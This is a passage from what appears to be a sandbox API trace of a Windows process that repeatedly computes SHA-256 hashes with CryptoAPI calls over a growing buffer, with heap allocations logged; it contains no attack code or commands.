pbData=0x32e5a8f0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a8f0, pdwDataLen=0xceaec) returned 1 [0147.954] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.954] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0147.954] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0147.954] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.954] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x640, dwFlags=0x0) returned 1 [0147.955] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.955] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b010 [0147.955] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b010, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b010, pdwDataLen=0xceaec) returned 1 [0147.955] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.955] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0147.955] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0147.955] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.955] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x660, dwFlags=0x0) returned 1 [0147.955] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.955] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a920 [0147.955] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a920, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a920, pdwDataLen=0xceaec) returned 1 [0147.955] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.955] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0147.955] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.956] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.956] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x680, dwFlags=0x0) returned 1 [0147.956] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.956] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b1c0 [0147.956] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5b1c0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b1c0, pdwDataLen=0xceaec) returned 1 [0147.956] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.956] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.956] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0147.957] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.957] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0147.957] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a830 [0147.957] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a830, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a830, pdwDataLen=0xceaec) returned 1 [0147.957] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.957] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0147.957] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.957] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.957] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0147.957] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.957] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a890 [0147.958] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x2, pbData=0x32e5a890, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a890, pdwDataLen=0xceaec) returned 1 [0147.958] CryptDestroyHash (hHash=0x332b7890) returned 1 [0147.958] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.958] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0147.958] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.958] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0147.958] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.958] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ae60 [0147.958] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e5ae60, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ae60, pdwDataLen=0xceaec) returned 1 [0147.958] CryptDestroyHash (hHash=0x332b7900) returned 1 [0147.958] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0147.958] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0147.959] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.959] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x700, dwFlags=0x0) returned 1 [0147.959] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.959] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b0d0 [0147.959] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b0d0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b0d0, pdwDataLen=0xceaec) returned 1 [0147.959] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.959] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0147.959] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.961] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.961] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x720, dwFlags=0x0) returned 1 [0147.961] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.961] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b100 [0147.961] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b100, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b100, pdwDataLen=0xceaec) returned 1 [0147.961] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.961] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.961] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338236d0) returned 1 [0147.961] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.961] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x740, dwFlags=0x0) returned 1 [0147.962] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.962] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b280 [0147.962] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b280, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b280, pdwDataLen=0xceaec) returned 1 [0147.962] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.962] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0147.962] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0147.962] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.962] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x760, dwFlags=0x0) returned 1 [0147.962] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.962] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5af50 [0147.962] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5af50, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5af50, pdwDataLen=0xceaec) returned 1 [0147.962] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.962] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0147.962] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.963] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.963] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x780, dwFlags=0x0) returned 1 [0147.963] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.963] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a8c0 [0147.963] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a8c0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a8c0, pdwDataLen=0xceaec) returned 1 [0147.963] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.963] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.963] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0147.964] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.964] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0147.964] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.964] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a710 [0147.964] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a710, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a710, pdwDataLen=0xceaec) returned 1 [0147.964] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.964] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0147.964] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821fd0) returned 1 [0147.964] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.964] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0147.964] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.964] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a950 [0147.965] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a950, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a950, pdwDataLen=0xceaec) returned 1 [0147.965] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.965] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0147.965] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822fd0) returned 1 [0147.965] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.965] CryptHashData (hHash=0x332b7a50, pbData=0x32e4ee50, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0147.965] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.965] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b0a0 [0147.965] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e5b0a0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b0a0, pdwDataLen=0xceaec) returned 1 [0147.965] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.965] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0147.965] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0147.966] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.966] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x800, dwFlags=0x0) returned 1 [0147.966] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.966] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a9b0 [0147.966] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5a9b0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a9b0, pdwDataLen=0xceaec) returned 1 [0147.966] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.966] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0147.966] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.967] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.967] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x820, dwFlags=0x0) returned 1 [0147.967] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.967] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b130 [0147.967] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5b130, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b130, pdwDataLen=0xceaec) returned 1 [0147.967] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.967] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.967] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.968] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.968] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x840, dwFlags=0x0) returned 1 [0147.968] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.968] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5afe0 [0147.968] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5afe0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5afe0, pdwDataLen=0xceaec) returned 1 [0147.968] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.968] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.968] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.968] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.968] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x860, dwFlags=0x0) returned 1 [0147.968] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.968] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ad10 [0147.968] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5ad10, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ad10, pdwDataLen=0xceaec) returned 1 [0147.968] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.969] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.969] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0147.969] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.969] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x880, dwFlags=0x0) returned 1 [0147.969] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.969] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5b160 [0147.969] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5b160, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5b160, pdwDataLen=0xceaec) returned 1 [0147.969] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.969] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0147.969] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.970] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.970] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0147.970] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.970] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5abc0 [0147.970] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5abc0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5abc0, pdwDataLen=0xceaec) returned 1 [0147.970] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.970] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.970] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.970] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.971] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0147.971] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.971] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5aad0 [0147.971] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5aad0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5aad0, pdwDataLen=0xceaec) returned 1 [0147.971] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.971] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.971] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0147.971] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.971] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0147.971] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.971] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a7a0 [0147.971] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a7a0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a7a0, pdwDataLen=0xceaec) returned 1 [0147.971] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.971] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0147.971] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0147.972] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.972] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x900, dwFlags=0x0) returned 1 [0147.972] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.972] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a980 [0147.972] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a980, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a980, pdwDataLen=0xceaec) returned 1 [0147.972] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.972] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0147.972] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0147.973] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.973] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x920, dwFlags=0x0) returned 1 [0147.973] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.973] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5abf0 [0147.973] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5abf0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5abf0, pdwDataLen=0xceaec) returned 1 [0147.973] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.973] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0147.973] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.973] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.973] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x940, dwFlags=0x0) returned 1 [0147.973] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.973] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5ad40 [0147.973] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5ad40, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5ad40, pdwDataLen=0xceaec) returned 1 [0147.973] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.973] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.973] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 